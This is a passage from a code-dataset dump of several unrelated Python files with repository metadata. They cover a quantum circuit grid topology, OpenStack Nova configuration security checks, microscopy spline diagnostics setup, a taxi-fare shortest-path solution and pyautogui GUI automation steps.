raise RuntimeError('This application requires Python 3.5 or later')
def main():
import m8tricks as app
from pathlib import Path
with Path(__file__).with_name('project.rst').open() as project:
setup(
name=app.__project__,
version=app.__version__,
description=app.__doc__,
long_description=project.read(),
classifiers=app.__classifiers__,
author=app.__author__,
author_email=app.__author_email__,
url=app.__url__,
license=[
c.rsplit('::', 1)[1].strip()
for c in app.__classifiers__
if c.startswith('License ::')
][0],
keywords=app.__keywords__,
packages=find_packages(),
include_package_data=True,
install_requires=app.__requires__,
entry_points=app.__entry_points__,
)
if __name__ == '__main__':
main()
| true | true |
1c4a805580426d4b5885f1258cc4efdfad25817c | 2,870 | py | Python | src/topology/general/nn_circuit.py | Dreamonic/shor-algorithm | 19a4d95f0f19809cd3fe1db4d834ff3a02fba68d | [
"MIT"
] | null | null | null | src/topology/general/nn_circuit.py | Dreamonic/shor-algorithm | 19a4d95f0f19809cd3fe1db4d834ff3a02fba68d | [
"MIT"
] | null | null | null | src/topology/general/nn_circuit.py | Dreamonic/shor-algorithm | 19a4d95f0f19809cd3fe1db4d834ff3a02fba68d | [
"MIT"
] | null | null | null | from math import ceil, sqrt
from projectq.ops import Swap
from src.topology.general.circuit import Circuit, LongDistanceAlgorithm, Statistics, Restrictions, Node
from src.topology.general.qubit import QubitHandler, QubitType
class GridSwap(LongDistanceAlgorithm):
def prepare(self, circuit, src, tgt, **kwargs):
path = self.find_shortest_path(circuit, src, tgt)
self.swap_path(circuit, path)
def teardown(self, circuit, src, tgt, **kwargs):
path = self.find_shortest_path(circuit, src, tgt)
self.swap_path(circuit, reversed(path))
def find_shortest_path(self, circuit, src, tgt):
q = [[src]]
while len(q) != 0:
path = q.pop(0)
cur = path[-1]
if cur == tgt:
return path
for n in circuit.graph[cur]:
new_path = list(path)
new_path.append(n)
q.append(new_path)
def swap_path(self, circuit, path):
prev = None
for i in path:
if prev is not None:
circuit.apply_two_qubit_gate(Swap, prev.name, i.name)
self.swap(prev, i)
prev = i
class GridCircuit(Circuit):
def __init__(self, engine, n, graph: dict = None, stats: Statistics = None, restrictions: Restrictions = None,
handlers: [QubitHandler] = None, ld_gate_algorithm=None):
super().__init__(graph=graph, stats=stats, restrictions=restrictions, handlers=handlers,
ld_gate_algorithm=ld_gate_algorithm)
self.create_grid(engine, ceil(sqrt(n)), ceil(n / sqrt(n)))
self.add_edges(ceil(sqrt(n)), ceil(n / sqrt(n)))
def create_grid(self, engine, x, y):
for idx in range(x):
for idy in range(y):
node = Node("log_" + str(idx) + "_" + str(idy), engine.allocate_qubit(), QubitType.LOGICAL,
restrictions=self.restrictions)
self.add_node(node)
def add_edges(self, x, y):
for idx in range(1, x - 1):
for idy in range(0, y):
self.add_edge(self.node("log_" + str(idx) + "_" + str(idy)),
self.node("log_" + str(idx - 1) + "_" + str(idy)))
self.add_edge(self.node("log_" + str(idx) + "_" + str(idy)),
self.node("log_" + str(idx + 1) + "_" + str(idy)))
for idx in range(0, x):
for idy in range(1, y - 1):
self.add_edge(self.node("log_" + str(idx) + "_" + str(idy)),
self.node("log_" + str(idx) + "_" + str(idy - 1)))
self.add_edge(self.node("log_" + str(idx) + "_" + str(idy)),
self.node("log_" + str(idx) + "_" + str(idy + 1)))
| 41 | 115 | 0.529965 | from math import ceil, sqrt
from projectq.ops import Swap
from src.topology.general.circuit import Circuit, LongDistanceAlgorithm, Statistics, Restrictions, Node
from src.topology.general.qubit import QubitHandler, QubitType
class GridSwap(LongDistanceAlgorithm):
def prepare(self, circuit, src, tgt, **kwargs):
path = self.find_shortest_path(circuit, src, tgt)
self.swap_path(circuit, path)
def teardown(self, circuit, src, tgt, **kwargs):
path = self.find_shortest_path(circuit, src, tgt)
self.swap_path(circuit, reversed(path))
def find_shortest_path(self, circuit, src, tgt):
q = [[src]]
while len(q) != 0:
path = q.pop(0)
cur = path[-1]
if cur == tgt:
return path
for n in circuit.graph[cur]:
new_path = list(path)
new_path.append(n)
q.append(new_path)
def swap_path(self, circuit, path):
prev = None
for i in path:
if prev is not None:
circuit.apply_two_qubit_gate(Swap, prev.name, i.name)
self.swap(prev, i)
prev = i
class GridCircuit(Circuit):
def __init__(self, engine, n, graph: dict = None, stats: Statistics = None, restrictions: Restrictions = None,
handlers: [QubitHandler] = None, ld_gate_algorithm=None):
super().__init__(graph=graph, stats=stats, restrictions=restrictions, handlers=handlers,
ld_gate_algorithm=ld_gate_algorithm)
self.create_grid(engine, ceil(sqrt(n)), ceil(n / sqrt(n)))
self.add_edges(ceil(sqrt(n)), ceil(n / sqrt(n)))
def create_grid(self, engine, x, y):
for idx in range(x):
for idy in range(y):
node = Node("log_" + str(idx) + "_" + str(idy), engine.allocate_qubit(), QubitType.LOGICAL,
restrictions=self.restrictions)
self.add_node(node)
def add_edges(self, x, y):
for idx in range(1, x - 1):
for idy in range(0, y):
self.add_edge(self.node("log_" + str(idx) + "_" + str(idy)),
self.node("log_" + str(idx - 1) + "_" + str(idy)))
self.add_edge(self.node("log_" + str(idx) + "_" + str(idy)),
self.node("log_" + str(idx + 1) + "_" + str(idy)))
for idx in range(0, x):
for idy in range(1, y - 1):
self.add_edge(self.node("log_" + str(idx) + "_" + str(idy)),
self.node("log_" + str(idx) + "_" + str(idy - 1)))
self.add_edge(self.node("log_" + str(idx) + "_" + str(idy)),
self.node("log_" + str(idx) + "_" + str(idy + 1)))
| true | true |
1c4a80ada0266eea6ace4af79ce1968081a0a12c | 5,578 | py | Python | reconbf/modules/test_nova.py | fallenpegasus/reconbf | bfd15bef549f011a3de885c3267d4f718223b798 | [
"Apache-2.0"
] | 45 | 2016-08-12T21:37:25.000Z | 2022-03-29T00:21:29.000Z | reconbf/modules/test_nova.py | fallenpegasus/reconbf | bfd15bef549f011a3de885c3267d4f718223b798 | [
"Apache-2.0"
] | 20 | 2016-08-11T07:42:28.000Z | 2016-09-09T13:33:47.000Z | reconbf/modules/test_nova.py | fallenpegasus/reconbf | bfd15bef549f011a3de885c3267d4f718223b798 | [
"Apache-2.0"
] | 6 | 2016-08-25T06:31:38.000Z | 2019-09-11T04:29:36.000Z | # Copyright 2016 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from reconbf.lib import test_class
from reconbf.lib.result import GroupTestResult
from reconbf.lib.result import Result
from reconbf.lib.result import TestResult
from reconbf.lib import utils
import grp
import os
import pwd
def _conf_location():
return {'dir': '/etc/nova'}
def _conf_details():
config = _conf_location().copy()
config['user'] = 'root'
config['group'] = 'root'
return config
@test_class.explanation("""
Protection name: Config permissions
Check: Are nova config permissions ok
Purpose: Nova config files contain authentication
details and need to be protected. Ensure that
they're only available to the service.
""")
@test_class.set_mapping("OpenStack:Check-Compute-01",
"OpenStack:Check-Compute-02")
@test_class.takes_config(_conf_details)
def config_permission(config):
try:
user = pwd.getpwnam(config['user'])
except KeyError:
return TestResult(Result.SKIP,
'Could not find user "%s"' % config['user'])
try:
group = grp.getgrnam(config['group'])
except KeyError:
return TestResult(Result.SKIP,
'Could not find group "%s"' % config['group'])
result = GroupTestResult()
files = ['nova.conf', 'api-paste.ini', 'policy.json', 'rootwrap.conf']
for f in files:
path = os.path.join(config['dir'], f)
result.add_result(path,
utils.validate_permissions(path, 0o640, user.pw_uid,
group.gr_gid))
return result
@test_class.explanation("""
Protection name: Authentication strategy
Check: Make sure proper authentication is used
Purpose: There are multiple authentication backends
available. Nova should be configured to authenticate
against keystone rather than test backends.
""")
@test_class.set_mapping("OpenStack:Check-Compute-03")
@test_class.takes_config(_conf_location)
def nova_auth(config):
try:
path = os.path.join(config['dir'], 'nova.conf')
nova_conf = utils.parse_openstack_ini(path)
except EnvironmentError:
return TestResult(Result.SKIP, 'cannot read nova config files')
auth = nova_conf.get('DEFAULT', {}).get('auth_strategy', 'keystone')
if auth != 'keystone':
return TestResult(Result.FAIL,
'authentication should be done by keystone')
else:
return TestResult(Result.PASS)
@test_class.explanation("""
Protection name: Keystone api access
Check: Does Keystone access use secure connection
Purpose: OpenStack components communicate with each other
using various protocols and the communication might
involve sensitive / confidential data. An attacker may
try to eavesdrop on the channel in order to get access to
sensitive information. Thus all the components must
communicate with each other using a secured communication
protocol.
""")
@test_class.set_mapping("OpenStack:Check-Compute-04")
@test_class.takes_config(_conf_location)
def keystone_secure(config):
try:
path = os.path.join(config['dir'], 'nova.conf')
nova_conf = utils.parse_openstack_ini(path)
except EnvironmentError:
return TestResult(Result.SKIP, 'cannot read nova config files')
protocol = nova_conf.get('keystone_authtoken', {}).get('auth_protocol',
'https')
identity = nova_conf.get('keystone_authtoken', {}).get('identity_uri',
'https:')
if not identity.startswith('https:'):
return TestResult(Result.FAIL, 'keystone access is not secure')
if protocol != 'https':
return TestResult(Result.FAIL, 'keystone access is not secure')
return TestResult(Result.PASS)
@test_class.explanation("""
Protection name: Glance api access
Check: Does Glance access use secure connection
Purpose: OpenStack components communicate with each other
using various protocols and the communication might
involve sensitive / confidential data. An attacker may
try to eavesdrop on the channel in order to get access to
sensitive information. Thus all the components must
communicate with each other using a secured communication
protocol.
""")
@test_class.set_mapping("OpenStack:Check-Compute-05")
@test_class.takes_config(_conf_location)
def glance_secure(config):
try:
path = os.path.join(config['dir'], 'nova.conf')
nova_conf = utils.parse_openstack_ini(path)
except EnvironmentError:
return TestResult(Result.SKIP, 'cannot read nova config files')
insecure = nova_conf.get('glance', {}).get(
'api_insecure', 'False').lower() == 'true'
if insecure:
return TestResult(Result.FAIL, 'glance access is not secure')
else:
return TestResult(Result.PASS)
| 34.645963 | 78 | 0.677483 |
from reconbf.lib import test_class
from reconbf.lib.result import GroupTestResult
from reconbf.lib.result import Result
from reconbf.lib.result import TestResult
from reconbf.lib import utils
import grp
import os
import pwd
def _conf_location():
return {'dir': '/etc/nova'}
def _conf_details():
config = _conf_location().copy()
config['user'] = 'root'
config['group'] = 'root'
return config
@test_class.explanation("""
Protection name: Config permissions
Check: Are nova config permissions ok
Purpose: Nova config files contain authentication
details and need to be protected. Ensure that
they're only available to the service.
""")
@test_class.set_mapping("OpenStack:Check-Compute-01",
"OpenStack:Check-Compute-02")
@test_class.takes_config(_conf_details)
def config_permission(config):
try:
user = pwd.getpwnam(config['user'])
except KeyError:
return TestResult(Result.SKIP,
'Could not find user "%s"' % config['user'])
try:
group = grp.getgrnam(config['group'])
except KeyError:
return TestResult(Result.SKIP,
'Could not find group "%s"' % config['group'])
result = GroupTestResult()
files = ['nova.conf', 'api-paste.ini', 'policy.json', 'rootwrap.conf']
for f in files:
path = os.path.join(config['dir'], f)
result.add_result(path,
utils.validate_permissions(path, 0o640, user.pw_uid,
group.gr_gid))
return result
@test_class.explanation("""
Protection name: Authentication strategy
Check: Make sure proper authentication is used
Purpose: There are multiple authentication backends
available. Nova should be configured to authenticate
against keystone rather than test backends.
""")
@test_class.set_mapping("OpenStack:Check-Compute-03")
@test_class.takes_config(_conf_location)
def nova_auth(config):
try:
path = os.path.join(config['dir'], 'nova.conf')
nova_conf = utils.parse_openstack_ini(path)
except EnvironmentError:
return TestResult(Result.SKIP, 'cannot read nova config files')
auth = nova_conf.get('DEFAULT', {}).get('auth_strategy', 'keystone')
if auth != 'keystone':
return TestResult(Result.FAIL,
'authentication should be done by keystone')
else:
return TestResult(Result.PASS)
@test_class.explanation("""
Protection name: Keystone api access
Check: Does Keystone access use secure connection
Purpose: OpenStack components communicate with each other
using various protocols and the communication might
involve sensitive / confidential data. An attacker may
try to eavesdrop on the channel in order to get access to
sensitive information. Thus all the components must
communicate with each other using a secured communication
protocol.
""")
@test_class.set_mapping("OpenStack:Check-Compute-04")
@test_class.takes_config(_conf_location)
def keystone_secure(config):
try:
path = os.path.join(config['dir'], 'nova.conf')
nova_conf = utils.parse_openstack_ini(path)
except EnvironmentError:
return TestResult(Result.SKIP, 'cannot read nova config files')
protocol = nova_conf.get('keystone_authtoken', {}).get('auth_protocol',
'https')
identity = nova_conf.get('keystone_authtoken', {}).get('identity_uri',
'https:')
if not identity.startswith('https:'):
return TestResult(Result.FAIL, 'keystone access is not secure')
if protocol != 'https':
return TestResult(Result.FAIL, 'keystone access is not secure')
return TestResult(Result.PASS)
@test_class.explanation("""
Protection name: Glance api access
Check: Does Glance access use secure connection
Purpose: OpenStack components communicate with each other
using various protocols and the communication might
involve sensitive / confidential data. An attacker may
try to eavesdrop on the channel in order to get access to
sensitive information. Thus all the components must
communicate with each other using a secured communication
protocol.
""")
@test_class.set_mapping("OpenStack:Check-Compute-05")
@test_class.takes_config(_conf_location)
def glance_secure(config):
try:
path = os.path.join(config['dir'], 'nova.conf')
nova_conf = utils.parse_openstack_ini(path)
except EnvironmentError:
return TestResult(Result.SKIP, 'cannot read nova config files')
insecure = nova_conf.get('glance', {}).get(
'api_insecure', 'False').lower() == 'true'
if insecure:
return TestResult(Result.FAIL, 'glance access is not secure')
else:
return TestResult(Result.PASS)
| true | true |
1c4a8104321bcc1796f75a2f5207296f38219830 | 674 | py | Python | 19th/sharing-taxi-fare/solution.py | WooJin1993/coding_test | ec9dc2dc768fe45700b4c0695b16535c0a824f6e | [
"MIT"
] | null | null | null | 19th/sharing-taxi-fare/solution.py | WooJin1993/coding_test | ec9dc2dc768fe45700b4c0695b16535c0a824f6e | [
"MIT"
] | null | null | null | 19th/sharing-taxi-fare/solution.py | WooJin1993/coding_test | ec9dc2dc768fe45700b4c0695b16535c0a824f6e | [
"MIT"
] | null | null | null | # 문제: https://programmers.co.kr/learn/courses/30/lessons/72413
# --- 풀이 ---
# INF = sys.maxsize 하는 경우, 효율성 테스트 1개 실패
# 계산 시간은 INF 크기에도 영향을 받는다.
from itertools import product
def solution(n, s, a, b, fares):
result = []
INF = 1e12
graph = [[INF] * (n+1) for _ in range(n + 1)]
for i in range(1, n + 1):
graph[i][i] = 0
for c, d, f in fares:
graph[c][d] = graph[d][c] = f
for k, i, j in product(range(1, n + 1), repeat=3):
graph[i][j] = min(graph[i][j], graph[i][k] + graph[k][j])
for mid in range(1, n + 1):
result.append(graph[s][mid] + graph[mid][a] + graph[mid][b])
return min(result) | 25.923077 | 68 | 0.531157 |
from itertools import product
def solution(n, s, a, b, fares):
result = []
INF = 1e12
graph = [[INF] * (n+1) for _ in range(n + 1)]
for i in range(1, n + 1):
graph[i][i] = 0
for c, d, f in fares:
graph[c][d] = graph[d][c] = f
for k, i, j in product(range(1, n + 1), repeat=3):
graph[i][j] = min(graph[i][j], graph[i][k] + graph[k][j])
for mid in range(1, n + 1):
result.append(graph[s][mid] + graph[mid][a] + graph[mid][b])
return min(result) | true | true |
1c4a8168020be394142ebda10e6e5df8bb4b44fb | 6,210 | py | Python | storm_analysis/diagnostics/spliner_2d/configure.py | bintulab/storm-analysis | 71ae493cbd17ddb97938d0ae2032d97a0eaa76b2 | [
"CNRI-Python"
] | null | null | null | storm_analysis/diagnostics/spliner_2d/configure.py | bintulab/storm-analysis | 71ae493cbd17ddb97938d0ae2032d97a0eaa76b2 | [
"CNRI-Python"
] | null | null | null | storm_analysis/diagnostics/spliner_2d/configure.py | bintulab/storm-analysis | 71ae493cbd17ddb97938d0ae2032d97a0eaa76b2 | [
"CNRI-Python"
] | null | null | null | #!/usr/bin/env python
"""
Configure folder for Spliner testing.
Hazen 09/17
"""
import argparse
import inspect
import numpy
import os
import storm_analysis
import storm_analysis.sa_library.parameters as parameters
import storm_analysis.sa_library.sa_h5py as saH5Py
import storm_analysis.simulator.background as background
import storm_analysis.simulator.camera as camera
import storm_analysis.simulator.emitters_on_grid as emittersOnGrid
import storm_analysis.simulator.emitters_uniform_random as emittersUniformRandom
import storm_analysis.simulator.photophysics as photophysics
import storm_analysis.simulator.psf as psf
import storm_analysis.simulator.simulate as simulate
import storm_analysis.spliner.measure_psf as measurePSF
import storm_analysis.spliner.psf_to_spline as psfToSpline
import storm_analysis.diagnostics.spliner_2d.settings as settings
def testingParameters(cal_file = None):
"""
Create a Spliner parameters object.
"""
params = parameters.ParametersSpliner()
params.setAttr("max_frame", "int", -1)
params.setAttr("start_frame", "int", -1)
params.setAttr("background_sigma", "float", 8.0)
if cal_file is not None:
params.setAttr("camera_calibration", "filename", cal_file)
else:
params.setAttr("camera_gain", "float", settings.camera_gain)
params.setAttr("camera_offset", "float", settings.camera_offset)
params.setAttr("find_max_radius", "int", 5)
params.setAttr("iterations", "int", settings.iterations)
params.setAttr("no_fitting", "int", 0)
params.setAttr("pixel_size", "float", settings.pixel_size)
params.setAttr("sigma", "float", 1.5)
params.setAttr("spline", "filename", "psf.spline")
params.setAttr("threshold", "float", 6.0)
# Don't do tracking.
params.setAttr("descriptor", "string", "1")
params.setAttr("radius", "float", "0.0")
# Don't do drift-correction.
params.setAttr("d_scale", "int", 2)
params.setAttr("drift_correction", "int", 0)
params.setAttr("frame_step", "int", 500)
params.setAttr("z_correction", "int", 0)
# 'peak_locations' testing.
if hasattr(settings, "peak_locations") and (settings.peak_locations is not None):
params.setAttr("peak_locations", "filename", settings.peak_locations)
return params
def configure(no_splines, cal_file = None):
# Create sCMOS calibration file if requested.
#
if cal_file is not None:
offset = numpy.zeros((settings.y_size, settings.x_size)) + settings.camera_offset
variance = numpy.ones((settings.y_size, settings.x_size))
gain = numpy.ones((settings.y_size, settings.x_size)) * settings.camera_gain
rqe = numpy.ones((settings.y_size, settings.x_size))
numpy.save(cal_file, [offset, variance, gain, rqe, 2])
# Create parameters file for analysis.
#
print("Creating XML file.")
params = testingParameters(cal_file = cal_file)
params.toXMLFile("spliner.xml")
# Create localization on a grid file.
#
print("Creating gridded localization.")
emittersOnGrid.emittersOnGrid("grid_list.hdf5",
settings.nx,
settings.ny,
1.5,
20,
0.0,
0.0)
# Create randomly located localizations file.
#
print("Creating random localization.")
emittersUniformRandom.emittersUniformRandom("random_list.hdf5",
1.0,
settings.margin,
settings.x_size,
settings.y_size,
0.0)
# Create sparser grid for PSF measurement.
#
print("Creating data for PSF measurement.")
emittersOnGrid.emittersOnGrid("sparse_list.hdf5",
6,
3,
1.5,
40,
0.0,
0.0)
if no_splines:
return
# Create beads.txt file for spline measurement.
#
with saH5Py.SAH5Py("sparse_list.hdf5") as h5:
locs = h5.getLocalizations()
numpy.savetxt("beads.txt", numpy.transpose(numpy.vstack((locs['x'], locs['y']))))
# Create simulated data for PSF measurement.
#
bg_f = lambda s, x, y, i3 : background.UniformBackground(s, x, y, i3, photons = 10)
cam_f = lambda s, x, y, i3 : camera.Ideal(s, x, y, i3, 100.)
pp_f = lambda s, x, y, i3 : photophysics.AlwaysOn(s, x, y, i3, 20000.0)
psf_f = lambda s, x, y, i3 : psf.GaussianPSF(s, x, y, i3, settings.pixel_size)
sim = simulate.Simulate(background_factory = bg_f,
camera_factory = cam_f,
photophysics_factory = pp_f,
psf_factory = psf_f,
dither = True,
x_size = settings.x_size,
y_size = settings.y_size)
sim.simulate("spline_2d.tif", "sparse_list.hdf5", 5)
# Measure the PSF.
#
print("Measuring PSF.")
psf_name = "psf.psf"
measurePSF.measurePSF("spline_2d.tif",
"na",
"sparse_list.hdf5",
psf_name,
want2d = True,
aoi_size = int(settings.spline_size + 1),
pixel_size = settings.pixel_size * 1.0e-3)
# Measure the Spline.
#
if True:
print("Measuring Spline.")
psfToSpline.psfToSpline(psf_name, "psf.spline", settings.spline_size)
if (__name__ == "__main__"):
parser = argparse.ArgumentParser(description = 'Spline diagnostics configuration.')
parser.add_argument('--no-splines', dest='no_splines', action='store_true', default = False)
args = parser.parse_args()
configure(args.no_splines)
| 35.689655 | 96 | 0.585829 | import argparse
import inspect
import numpy
import os
import storm_analysis
import storm_analysis.sa_library.parameters as parameters
import storm_analysis.sa_library.sa_h5py as saH5Py
import storm_analysis.simulator.background as background
import storm_analysis.simulator.camera as camera
import storm_analysis.simulator.emitters_on_grid as emittersOnGrid
import storm_analysis.simulator.emitters_uniform_random as emittersUniformRandom
import storm_analysis.simulator.photophysics as photophysics
import storm_analysis.simulator.psf as psf
import storm_analysis.simulator.simulate as simulate
import storm_analysis.spliner.measure_psf as measurePSF
import storm_analysis.spliner.psf_to_spline as psfToSpline
import storm_analysis.diagnostics.spliner_2d.settings as settings
def testingParameters(cal_file = None):
params = parameters.ParametersSpliner()
params.setAttr("max_frame", "int", -1)
params.setAttr("start_frame", "int", -1)
params.setAttr("background_sigma", "float", 8.0)
if cal_file is not None:
params.setAttr("camera_calibration", "filename", cal_file)
else:
params.setAttr("camera_gain", "float", settings.camera_gain)
params.setAttr("camera_offset", "float", settings.camera_offset)
params.setAttr("find_max_radius", "int", 5)
params.setAttr("iterations", "int", settings.iterations)
params.setAttr("no_fitting", "int", 0)
params.setAttr("pixel_size", "float", settings.pixel_size)
params.setAttr("sigma", "float", 1.5)
params.setAttr("spline", "filename", "psf.spline")
params.setAttr("threshold", "float", 6.0)
params.setAttr("descriptor", "string", "1")
params.setAttr("radius", "float", "0.0")
# Don't do drift-correction.
params.setAttr("d_scale", "int", 2)
params.setAttr("drift_correction", "int", 0)
params.setAttr("frame_step", "int", 500)
params.setAttr("z_correction", "int", 0)
if hasattr(settings, "peak_locations") and (settings.peak_locations is not None):
params.setAttr("peak_locations", "filename", settings.peak_locations)
return params
def configure(no_splines, cal_file = None):
if cal_file is not None:
offset = numpy.zeros((settings.y_size, settings.x_size)) + settings.camera_offset
variance = numpy.ones((settings.y_size, settings.x_size))
gain = numpy.ones((settings.y_size, settings.x_size)) * settings.camera_gain
rqe = numpy.ones((settings.y_size, settings.x_size))
numpy.save(cal_file, [offset, variance, gain, rqe, 2])
print("Creating XML file.")
params = testingParameters(cal_file = cal_file)
params.toXMLFile("spliner.xml")
print("Creating gridded localization.")
emittersOnGrid.emittersOnGrid("grid_list.hdf5",
settings.nx,
settings.ny,
1.5,
20,
0.0,
0.0)
print("Creating random localization.")
emittersUniformRandom.emittersUniformRandom("random_list.hdf5",
1.0,
settings.margin,
settings.x_size,
settings.y_size,
0.0)
print("Creating data for PSF measurement.")
emittersOnGrid.emittersOnGrid("sparse_list.hdf5",
6,
3,
1.5,
40,
0.0,
0.0)
if no_splines:
return
with saH5Py.SAH5Py("sparse_list.hdf5") as h5:
locs = h5.getLocalizations()
numpy.savetxt("beads.txt", numpy.transpose(numpy.vstack((locs['x'], locs['y']))))
bg_f = lambda s, x, y, i3 : background.UniformBackground(s, x, y, i3, photons = 10)
cam_f = lambda s, x, y, i3 : camera.Ideal(s, x, y, i3, 100.)
pp_f = lambda s, x, y, i3 : photophysics.AlwaysOn(s, x, y, i3, 20000.0)
psf_f = lambda s, x, y, i3 : psf.GaussianPSF(s, x, y, i3, settings.pixel_size)
sim = simulate.Simulate(background_factory = bg_f,
camera_factory = cam_f,
photophysics_factory = pp_f,
psf_factory = psf_f,
dither = True,
x_size = settings.x_size,
y_size = settings.y_size)
sim.simulate("spline_2d.tif", "sparse_list.hdf5", 5)
print("Measuring PSF.")
psf_name = "psf.psf"
measurePSF.measurePSF("spline_2d.tif",
"na",
"sparse_list.hdf5",
psf_name,
want2d = True,
aoi_size = int(settings.spline_size + 1),
pixel_size = settings.pixel_size * 1.0e-3)
if True:
print("Measuring Spline.")
psfToSpline.psfToSpline(psf_name, "psf.spline", settings.spline_size)
if (__name__ == "__main__"):
parser = argparse.ArgumentParser(description = 'Spline diagnostics configuration.')
parser.add_argument('--no-splines', dest='no_splines', action='store_true', default = False)
args = parser.parse_args()
configure(args.no_splines)
| true | true |
1c4a82c3e3b8ab680786c7cb5945c0ac48353bc2 | 5,065 | py | Python | GUIMonkey/Steps.py | Setyadjih/GUIMonkey | b1299663ee84de688663c08040d3411c78fb7fe1 | [
"MIT"
] | null | null | null | GUIMonkey/Steps.py | Setyadjih/GUIMonkey | b1299663ee84de688663c08040d3411c78fb7fe1 | [
"MIT"
] | 7 | 2021-04-27T03:39:32.000Z | 2021-09-03T05:31:38.000Z | GUIMonkey/Steps.py | Setyadjih/GUIMonkey | b1299663ee84de688663c08040d3411c78fb7fe1 | [
"MIT"
] | null | null | null | import time
from abc import ABC, abstractmethod
import pyautogui
from lib.logger import get_logger
class StepBase(ABC):
"""Base class for steps. We mainly want the execute interface"""
@abstractmethod
def __init__(self, step_name: str = None, logger=None):
self.name = step_name if step_name else self.__class__.__name__
self.data = dict()
self.flags = {
# Require Flags
"require": False,
"require_key": None,
# output Flags
"output": False,
"output_key": None,
}
self.logger = logger if logger else get_logger(self.name)
@abstractmethod
def execute(self):
self.logger.debug(f"Executing {self.name}...")
# TODO: This system seems fragile. How should in and out data be handled?
def require_data(self, require_bool=False, require_key=None):
self.flags["require"] = require_bool
self.flags["require_key"] = require_key
self.data[require_key] = None
def output_data(self, pass_bool=False, output_key=None):
self.flags["output"] = pass_bool
self.flags["output_key"] = output_key
self.data[output_key] = None
class KeyPress(StepBase):
def __init__(self, key, mod=None, step_name=None, logger=None):
super(KeyPress, self).__init__(step_name, logger)
self.key = key
self.mod = mod
def execute(self):
super(KeyPress, self).execute()
if self.mod:
pyautogui.keyDown(self.mod)
pyautogui.press(self.key)
pyautogui.keyUp(self.mod)
else:
pyautogui.press(self.key)
class WaitForImage(StepBase):
def __init__(self, image, timeout=30, step_name=None, logger=None):
super(WaitForImage, self).__init__(step_name, logger)
self.timeout = timeout
self.require_data(True, "image")
self.output_data(True, "image_loc")
self.data["image"] = image
def execute(self):
super(WaitForImage, self).execute()
start = time.time()
current = time.time()
while current - start < self.timeout:
time.sleep(3)
image = self.data["image"]
image_loc = pyautogui.locateCenterOnScreen(image, confidence=0.9)
if image_loc:
self.logger.debug("Found!")
self.data["image_loc"] = image_loc
return
else:
current = time.time()
self.logger.debug(f"Did not find image...{int(current - start)}/{self.timeout}")
self.logger.warning("Search timed out, returning...")
return
class Delay(StepBase):
def __init__(self, delay=0.5, step_name=None, logger=None):
super(Delay, self).__init__(step_name, logger)
self.delay = delay
def execute(self):
super(Delay, self).execute()
time.sleep(self.delay)
class MoveToButton(StepBase):
def __init__(self, button, step_name=None, logger=None):
super(MoveToButton, self).__init__(step_name, logger)
self.button = button
def execute(self):
super(MoveToButton, self).execute()
button_loc = pyautogui.locateCenterOnScreen(self.button, confidence=0.9)
pyautogui.moveTo(button_loc[0], button_loc[1])
class ClickOnButton(StepBase):
def __init__(self, button, click_num=1, step_name=None, logger=None):
super(ClickOnButton, self).__init__(step_name, logger)
self.require_data(True, "image_loc")
self.button = button
self.click_num = click_num
def execute(self):
super(ClickOnButton, self).execute()
button = pyautogui.locateCenterOnScreen(self.button, confidence=0.9)
for i in range(self.click_num):
pyautogui.click(button[0], button[1])
class Write(StepBase):
def __init__(self, text, enter=False, step_name=None, logger=None):
super(Write, self).__init__(step_name, logger)
self.text = text
self.enter = enter
def execute(self):
super(Write, self).execute()
pyautogui.write(self.text)
if self.enter:
pyautogui.press("enter")
class WaitForLoading(StepBase):
def __init__(self, loading_image, trigger_max=3, step_name=None, logger=None):
super(WaitForLoading, self).__init__(step_name, logger)
self.loading_image = loading_image
self.trigger_max = trigger_max
def execute(self):
super(WaitForLoading, self).execute()
trigger = 0
while trigger < self.trigger_max:
load1 = pyautogui.locateCenterOnScreen("resources/CLO_loading.png", confidence=0.9)
if load1:
self.logger.debug("found loading, waiting...")
trigger = 0
pyautogui.moveTo(load1)
time.sleep(3)
else:
trigger += 1
time.sleep(1)
self.logger.debug(f"Did not find loading, triggering ({trigger} / " f"{self.trigger_max})")
| 31.855346 | 107 | 0.615597 | import time
from abc import ABC, abstractmethod
import pyautogui
from lib.logger import get_logger
class StepBase(ABC):
@abstractmethod
def __init__(self, step_name: str = None, logger=None):
self.name = step_name if step_name else self.__class__.__name__
self.data = dict()
self.flags = {
"require": False,
"require_key": None,
"output": False,
"output_key": None,
}
self.logger = logger if logger else get_logger(self.name)
@abstractmethod
def execute(self):
self.logger.debug(f"Executing {self.name}...")
def require_data(self, require_bool=False, require_key=None):
self.flags["require"] = require_bool
self.flags["require_key"] = require_key
self.data[require_key] = None
def output_data(self, pass_bool=False, output_key=None):
self.flags["output"] = pass_bool
self.flags["output_key"] = output_key
self.data[output_key] = None
class KeyPress(StepBase):
def __init__(self, key, mod=None, step_name=None, logger=None):
super(KeyPress, self).__init__(step_name, logger)
self.key = key
self.mod = mod
def execute(self):
super(KeyPress, self).execute()
if self.mod:
pyautogui.keyDown(self.mod)
pyautogui.press(self.key)
pyautogui.keyUp(self.mod)
else:
pyautogui.press(self.key)
class WaitForImage(StepBase):
def __init__(self, image, timeout=30, step_name=None, logger=None):
super(WaitForImage, self).__init__(step_name, logger)
self.timeout = timeout
self.require_data(True, "image")
self.output_data(True, "image_loc")
self.data["image"] = image
def execute(self):
super(WaitForImage, self).execute()
start = time.time()
current = time.time()
while current - start < self.timeout:
time.sleep(3)
image = self.data["image"]
image_loc = pyautogui.locateCenterOnScreen(image, confidence=0.9)
if image_loc:
self.logger.debug("Found!")
self.data["image_loc"] = image_loc
return
else:
current = time.time()
self.logger.debug(f"Did not find image...{int(current - start)}/{self.timeout}")
self.logger.warning("Search timed out, returning...")
return
class Delay(StepBase):
def __init__(self, delay=0.5, step_name=None, logger=None):
super(Delay, self).__init__(step_name, logger)
self.delay = delay
def execute(self):
super(Delay, self).execute()
time.sleep(self.delay)
class MoveToButton(StepBase):
def __init__(self, button, step_name=None, logger=None):
super(MoveToButton, self).__init__(step_name, logger)
self.button = button
def execute(self):
super(MoveToButton, self).execute()
button_loc = pyautogui.locateCenterOnScreen(self.button, confidence=0.9)
pyautogui.moveTo(button_loc[0], button_loc[1])
